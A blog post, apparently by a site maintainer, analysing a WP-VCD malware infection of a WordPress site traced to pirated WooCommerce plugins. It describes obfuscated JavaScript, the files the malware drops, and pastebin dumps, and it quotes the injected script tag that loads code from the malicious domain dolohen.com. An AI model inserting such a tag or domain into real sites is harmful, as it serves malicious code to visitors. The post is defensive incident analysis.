Preface

While recently maintaining a wordpress website for a client I came across a weird piece of code which caught my attention:


<script type="text/javascript" src="https://dolohen.com/apu.php?zoneid=2285981">

I was able to see this referenced script through my personal web crawler: Kraken

The tool is not yet available to public as I am finishing a few touches but here is the part of the report generated:

Here were a few of the domains which were randomly added to pages:

  • https://perf.cdnads.com/
  • https://dolohen.com/

Those links especially the dolohen led me to some interesting Javascript code and realised that some of the code could be potentially dangerous.

Dolohen Overview

Here is a pastebin of the formatted code recovered from the dolohen domain:

https://pastebin.com/FMMbqhxk

I noticed pretty fast that the first strings set in the variable a was encoded in base64. Running a small loop I reversed the strings and as you can see in the list in this pastebin:

https://pastebin.com/h43WqBkc

We can see here a few strings which make us wonder what this javascript is exactly doing:

  • forcedPerfomanceCall
  • connectStart
  • tryToEscapeIframe
  • secureScriptInject
  • trackWindow

These are just a few examples of the keywords found in the reversed string. This was enough to alarm me that this javascript was probably made with malicious intent. This was strongly enhanced by the fact that the whole javascript code was obfuscated.

Back to the infection

Knowing quite well how the wordpress ecosystem functions I started going to see what could have changed in the files. I ran the following command:

find . -type f -mtime -10

So I could see all the created files in the pas 10 days. I noticed that a few files had been added to my wp-includes folder.

  • wp-includes/wp-tmp.php
  • wp-includes/wp-vcd.php
  • wp-includes/class.wp.php

Looking at the code in those files I noticed a lot of code which was calling external urls or trying to inject data to the database.

At this point I knew the website had be compromised. I ran a plugin scan and detected two plugins that were harmful to the website:

  • woocommerce cost of goods
  • woocommerce customer order csv export

From here on I have kept investigating to find more and more code that those plugin injected. In a way it is pretty smart as the external links are only added if the user isn’t part of managing team.

Looking at WP-VCD

Some of the code execute through those plugins were set into a file called:

wp-vcd.php

Here is a copy of the file:

https://pastebin.com/TT1WwXZs

By drecrypting the first base64 string installcode we can clearly see the malicious intent of the code. Here is a copy of the installcode reversed:

https://pastebin.com/GgXM6v2s

From this install code we can clearly see how it sends a request to a domain to get code (line 69) which is later written into a file.

We can see in the install code how it clearly creates the following file:

  • wp-tmp.php

Here is a dump of the said file

https://pastebin.com/ZXqBiCvw

We can clearly see how the javascript is injected into pages (line 11,12,22,23)

Postface

Having later checked and compared with backups and checking logs and file information and more i’m pretty sure it would come from those plugins as this was the only actions the client took in those recent days looking at the event.

Upon further investigation I can’t verify from which source the plugins were downloaded but this is a clear example on why companies should take time to analyze their needs and not hesitate to pay for desired functionnalities instead of going to shady sources.

The results of wanting to save a few dollars ended up in a wide infection of the platform which resulted in many hours of meticulous analysis to clean and make the platform functionnal once more.

Burlet Mederic